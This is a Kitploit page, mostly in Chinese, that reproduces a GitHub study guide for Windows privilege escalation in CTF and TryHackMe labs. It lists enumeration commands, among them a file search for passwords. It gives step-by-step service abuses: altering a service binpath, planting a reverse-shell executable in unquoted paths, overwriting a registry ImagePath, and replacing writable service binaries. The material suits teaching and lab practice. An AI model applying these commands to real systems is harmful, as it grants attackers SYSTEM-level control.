Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Windows-Privilege-Escalation-Notes — 我的 Windows 权限提升概念手册。请查看我的播放列表,链接:https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk | Kitploit
工具/GitHubGitHub/saisathvik1/windows-privilege-escalation-notes
权限提升密码攻击漏洞利用信息收集后渗透利用CTF渗透测试学习与教育

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
saisathvik1/windows-privilege-escalation-notes

Windows-Privilege-Escalation-Notes

我的 Windows 权限提升概念手册。请查看我的播放列表,链接:https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk

查看仓库
5914334年前Kitploit 审核通过

Windows 权限提升

  • 推荐使用 https://tryhackme.com/room/windows10privesc 的房间,但你可以选择任何你喜欢的。
  • 一些资源,
    • https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
    • https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
    • https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
    • https://www.fuzzysecurity.com/tutorials/16.html

Windows 机器中的账户类型:

  • Administrator(本地):这是拥有最高权限的用户。
  • Standard(本地):这些用户可以访问计算机,但只能执行有限的任务。通常,这些用户无法对系统进行永久性或关键性更改。
  • Guest:此账户允许访问系统,但并未定义为用户。
  • Standard(域):Active Directory 允许组织管理用户账户。标准域账户可能拥有本地管理员权限。
  • Administrator(域):可被视为权限最高的用户。它可以在整个组织的域中编辑、创建和删除其他用户。
  • SYSTEM : 这并非严格意义上的账户,但 Windows 服务会利用该账户来执行任务,而且该账户甚至拥有更高的权限。

An Important point worth noting is Groups, any user of Group Administrator helps us to escalate!


信息收集:

  • 最佳资源之一:https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
  1. whoami /priv - 当前用户的权限
  2. net users - 列出所有用户
  3. net user <username> - 列出特定用户的详细信息
  4. qwinsta - 同时登录的其他用户
  5. net localgroup - 系统中可用的组
  6. net localgroup <group-name> - 列出特定组的成员
  7. systeminfo - 提供有关操作系统的所有信息
  8. hostname - 系统的主机名
  9. findstr /si password *.txt - 我们正在查找包含“password”的文本文件
  10. wmic qfe get Caption,Description,HotFixID,InstalledOn - 这提供有关安全修补程序及相关信息
  11. netstat -ano - 与机器关联的连接
  12. schtasks /query /fo LIST /v - 查看已计划的任务
  13. driverquery - 列出驱动程序相关信息
  14. sc query windefend - 查找防病毒服务

Windows Exploit Suggester:

  • 这是一个传奇工具,大多数人都使用它
  • 使用此工具,我们可以解决互联网上 60% 的靶机。
  • 链接:https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  • 只需在您的机器上保存一份 systeminfo 工具的输出,这就是该工具的唯一要求。
  • 专业提示:确保所有依赖项均已满足!

易受攻击的软件:

  • 这里我们将尝试查找已安装的软件版本,并检查其是否存在漏洞。
  • wmic product get name,version,vendor - 这会提供产品名称、版本和供应商。这条命令能很好地可视化我们所需的信息。
  • 有时上述命令可能无法使用,因此请使用 wmic service list brief | findstr "Running",而要获取有关该服务的更多信息,请使用 sc qc <ServiceName>。


通过 Metasploit 进行权限提升:

  • 在 Metasploit 中获得会话后,运行名为 post/multi/recon/local_exploit_suggester 的模块,确保你的会话处于后台,这样该工具才能正常工作,或者你可以直接从 meterpreter 中加载。
  • 然后它会建议一些可被利用的模块,试试它们,其中一些可能会生效(可选)。


WinPEAS:

  • 这是一个非常有用的自动化枚举脚本。
  • 为了最佳使用效果,请运行 winpeas.exe --help 查看所有选项。
  • 只运行所需的选项,并调整输出内容。


内核漏洞利用:

  • 使用这个名为 Windows Exploit Suggester 的特定工具。
  • 首先,通过运行 systeminfo 命令获取系统信息,将其复制到任意文件中,并以 .txt 扩展名命名。
  • 然后使用数据库运行该工具。
  • 在这里查找与内核相关的漏洞利用。
  • 祝黑客之旅愉快!!


服务漏洞利用:

不安全的服务权限:

  • 这里我们将尝试识别具有不安全权限的服务,然后尝试利用它们。

  • 这里我们可以使用 winpeas.exe servicesinfo 命令,可以看到哪些服务非常有帮助。

  • 输出中一个有趣的部分如下,```

    daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped YOU CAN MODIFY THIS SERVICE: ChangeConfig

- 但为了获取更多信息,我们可以使用一个名为 **accesschk** 的工具,它由微软开发,运行方式如下 `accesschk.exe /accepteula -uwcqv <current-user> <service>`,输出为,```
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

  • 但主要部分是 service_change_config,我们可以在其中更改服务的配置。
  • 运行 sc qc <service>,然后记下 Binary_path_name(也可以称为 binpath),这就是我们要更改的(邪恶的微笑)
  • 现在创建一个 shell 类型的 payload,并将其传输到目标机器
  • 更改配置的语法:sc config <service> <option>="<value>"
  • 现在执行 sc config daclsvc binpath="<path>",然后启动服务:sc start daclsvc

Unquoted Service Path:(USP)

  • 对于服务,路径需要用引号括起来,如果没有这样括起来,那么我们就可以利用这个漏洞来获得高权限。``` Vulnerability Insight: The Windows API must assume where to find the referenced application if the path contains spaces and is not enclosed by quotation marks. If, for example, a service uses the unquoted path:

Vulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe

The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a writeable directory.

C:\Program.exe C:\Program Files\Ignite.exe C:\Program Files\Ignite Data\Vuln.exe C:\Program Files\Ignite Data\Vuln Service\file.exe

- 要获取更多信息,只需使用 **WinPEAS** 脚本并加上 `servicesinfo` 选项,这里我们可以查看是否存在任何可利用的 **Unquoted Service Path**。这里我运行了该工具,输出中比较有趣的部分如下所示,```
unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detected  
  • 这里的输出明确显示 无引号且检测到空格,因此我们可以得出结论:我们可以使用 USP 来利用这个特定服务。
  • 要获取有关该服务的更多信息,请使用 sc qc <service>
  • 现在让我们使用 accesschk 检查这个特定位置 C:\Program Files\Unquoted Path Service 的权限,因此运行 accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service"。输出:``` accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service" C:\Program Files\Unquoted Path Service Medium Mandatory Level (Default) [No-Write-Up] RW BUILTIN\Users RW NT SERVICE\TrustedInstaller RW NT AUTHORITY\SYSTEM RW BUILTIN\Administrators
- 我们拥有读写权限。
- 现在我们将创建一个载荷并将其放入 `C:\Program Files\Unquoted Path Service`,通过 `copy reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"`,这里我使用了一个不同的名称,这在字母顺序上也有一定优势。
- 现在启动服务,`sc start unquotedsvc`,我们是管理员了!!!

-----------------------
### 弱注册表权限:
- 这里我们将尝试利用具有弱注册表权限的服务。
- 为了查找,我们需要使用带有 `servicesinfo` 选项的 `Winpeas`。输出看起来类似这样:```
����������͹ Looking if you can modify any service registry
� Check if you can modify the registry of a service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services-registry-permissions                                                                                          
    HKLM\system\currentcontrolset\services\regsvc (Interactive [FullControl])

现在我们得到了服务的名称,即 regsvc,让我们深入了解这个服务,运行 sc qc regsvc,输出如下:``` sc qc regsvc [SC] QueryServiceConfig SUCCESS

SERVICE_NAME: regsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Insecure Registry Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

- 一个很酷的事实是,路径带有引号,所以不存在**未加引号的服务路径**。
- 现在让我们运行 `accesschk.exe` 深入挖掘,所以运行 `accesschk /acceptula -uvwqk <path of registry>`(即 `HKLM\system\currentcontrolset\services\regsvc`)
- 在输出中查找 `RW NT AUTHORITY\INTERACTIVE(KEY_ALL_ACCESS)`,现在我们就可以顺利利用了。
- 现在让我们通过 `reg query HKLM\system\currentcontrolset\services\regsvc` 查看注册表中的选项,我发现一个名为 `ImagePath` 的选项,它接受可执行文件的值,所以让我们利用它。首先创建一个反弹 shell。
- 现在运行 `reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f`,根据你的需求选择 payload 的路径。
- 现在运行服务 `net start regsvc`,太棒了!我获得了 shell。

-----------------------  
### 不安全的服务可执行文件:
- 这里的服务文件权限对所有用户开放!我们尝试修改服务的可执行文件,就可以搞定了!
- 让我们运行 **Winpeas**,特别是使用 **servicesinfo** 模块,看看有什么有趣的东西,输出结果如下:```
filepermsvc(File Permissions Service)["C:\Program Files\File Permissions Service\filepermservice.exe"] - Manual - Stopped
    File Permissions: Everyone [AllAccess]

  • 每个人都可以访问服务 filepermsvc 的文件,所以我们将创建一个 reverse_shell 的 payload,并用它替换服务的可执行文件,从而获得 shell。
  • 与上面相比,这有点容易。


Registry

  • 在这里,我们利用注册表来查找信息并尝试进行利用!
  • 我们只是在检查我们可以滥用的功能。
下载工具